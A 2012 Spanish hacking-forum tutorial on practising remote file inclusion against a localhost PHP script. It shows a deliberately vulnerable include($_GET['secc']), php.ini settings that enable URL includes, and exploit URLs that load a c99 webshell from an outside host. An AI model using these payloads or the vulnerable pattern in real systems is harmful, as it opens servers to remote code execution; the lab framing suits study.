[Práctica] RFI por localhost

  • 0 Respuestas
  • 2358 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 4lC0nR2

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

[Práctica] RFI por localhost

  • en: Diciembre 21, 2012, 02:17:44 pm
Este documento lo tenia hace tiempo, pero queria compartirlos con ustedes, una prueba de rfi en localhost, ya que este tipo de vulnerabilidad no se encuentra en muchas webs o casi ninguna ya que los servidores web tienen parcheado.

Creamos un archivo llamado rfi.php con este codigo:

Código: PHP
  1. <?php
  2.  
  3. $archivo =  $_GET['secc'];
  4.  
  5. include($archivo);
  6.  
  7. ?>

La variable vulnerable es $_GET['secc']

Para probar en localhost hacemos esto:

Hay que tener en ON estas funciones en el archivo php.ini:

Código: [Seleccionar]
; Whether to allow the treatment of  URLs (like http:// or ftp://) as files.

allow_url_fopen = On



;  Whether to allow include/require to open URLs (like http:// or ftp://) as  files.

allow_url_include = On



; Whether or not to register the  EGPCS variables as global variables. You may

; want to turn this off if  you don't want to clutter your scripts' global scope

; with user data.  This makes most sense when coupled with track_vars - in which

; case you  can access all of the GPC variables through the $HTTP_*_VARS[],

;  variables.

;

; You should do your best to write your scripts so that  they do not require

; register_globals to be on; Using form variables as  globals can easily lead

; to possible security problems, if the code is  not very well thought of.

register_globals = On

Reiniciar nuestra pc para que los cambios surjan efecto.

Podemos vulnerarlo asi:

http://localhost/rfi.php?secc=http://www.1earn.net/LAB/code/webshell/c99.txt?

Tambien con una imagen:

http://localhost/rfi.php?secc=http://www.1earn.net/LAB/code/webshell/c99.gif?

Esto seria lo basico de un RFI, hoy en dia se encuentran muy pocas este tipo de vulnerabilidades por ultimas versiones recientes en los servidores.

Espero les haya gustado, para asi aportar mas posts.

Fuente: http://www.blogsdeinformatica.cz.cc:8080/4lC0nR2/articulo/464646621/prctica-rfi-por-localhost/

 

Explicacion practica de sqli [a pedido de staRgan]

Iniciado por blozzter

Respuestas: 0
Vistas: 2641
Último mensaje Agosto 24, 2011, 09:15:14 pm
por blozzter
Práctica de Asalto a una sesión TCP

Iniciado por Alex

Respuestas: 12
Vistas: 6692
Último mensaje Noviembre 30, 2012, 06:51:33 pm
por Matabarras